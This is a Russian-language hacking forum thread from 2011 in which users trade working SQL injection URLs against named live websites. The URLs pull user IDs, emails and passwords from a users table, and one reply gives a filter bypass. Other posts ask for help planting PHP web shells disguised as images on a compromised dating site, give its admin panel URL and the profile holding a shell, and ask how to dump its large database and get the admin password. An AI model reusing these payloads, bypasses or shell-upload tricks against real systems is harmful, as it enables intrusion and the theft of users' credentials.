ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

28.01.2011, 01:12
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме: 479
Репутация:
0
|
|
Так работает:
Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
А так нет:
Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
Почему? =\
|
|
|

28.01.2011, 01:50
|
|
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
Провел на форуме: 792994
Репутация:
104
|
|
Сообщение от DCrypt
Так работает:
Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
А так нет:
Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
Почему? =\
Кажется там from фильтруется.
|
|
|

28.01.2011, 02:27
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме: 479
Репутация:
0
|
|
Сообщение от None
Кажется там from фильтруется.
http://www.exploit-db.com/exploits/16060/
Где?
|
|
|

28.01.2011, 14:03
|
|
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
Провел на форуме: 31258
Репутация:
7
|
|
Сообщение от DCrypt
http://www.exploit-db.com/exploits/16060/
Где?
а при чем тут сама уязвимость, фильтруется на хосте, только не from, а select from, обходится так:
Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT%0a1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
|
|
|

28.01.2011, 15:04
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме: 0
Репутация:
0
|
|
подскажите софт или скрипт для быстрого блайнда? а то приходится долго ждать пока идет перебор
|
|
|

28.01.2011, 15:25
|
|
Познающий
Регистрация: 09.07.2010
Сообщений: 58
Провел на форуме: 20602
Репутация:
0
|
|
поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager
|
|
|

28.01.2011, 23:04
|
|
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
Провел на форуме: 23579
Репутация:
-5
|
|
uname -a: Windows NT WINCTRL-7IBNPUN 6.1 build 7600 ((null)) i586
Safe-mode: ON (secure)
C:\ drwxrwxrwx
(это пхп шелл)
Можно как-то запускать радмин или что-то?
|
|
|

29.01.2011, 01:07
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме: 919131
Репутация:
74
|
|
Сообщение от KandidaT'S
поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager
Нереал так подсказать.
В админке есть залив файлов?
Сообщение от noviyuser
подскажите софт или скрипт для быстрого блайнда? а то приходится долго ждать пока идет перебор
Тулза от Пашкелы вроде умеет.
|
|
|

29.01.2011, 08:26
|
|
Познающий
Регистрация: 09.07.2010
Сообщений: 58
Провел на форуме: 20602
Репутация:
0
|
|
заливка фаилов есть я так понел картинки и pdf заливаю sheel.php.pdf пишет неправильное название
|
|
|

29.01.2011, 09:28
|
|
Новичок
Регистрация: 07.10.2010
Сообщений: 0
Провел на форуме: 0
Репутация:
0
|
|
Вопрос простой-заливаю шелл в картинку при помощи Notepad, затем ставлю её в датинге как основное фото(админом не спалилось) .Далее копирую урл картинки и шелл нифига не открывается- почему? Заливаю как shell.php.jpg. Shell.jpg.php не прокатывает. Может какой другой прогой шелл в картинку вливать? Если делать просто шелл без изображения т.е. просто конвертировать название шелла- то вообще не прокатывает.
http://okfreedating.net/static/i/1/10/A8/t_u594088_399_shell.php.jpg либо так http://okfreedating.net/photo.php?user_id=594088&album_id=1¤t=0 , а шелл не открывается-(((
И ещё. Зная на взломанном сайте таблицы,номера колонок и т.д.,т.е. полный путь до нужной базы,но опять же без админки, чем сдампить эту базу? Пытался сдампить Havij 1.14, но слишком долго-база миллионник-)
ICQ 620198086
http://admin.okfreedating.net/login.php- админка
профиль где залит шелл: vlamalijj@Fdfnfh
И ещё- как получить пароль админа? Просьба не пинать-) Учусь
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|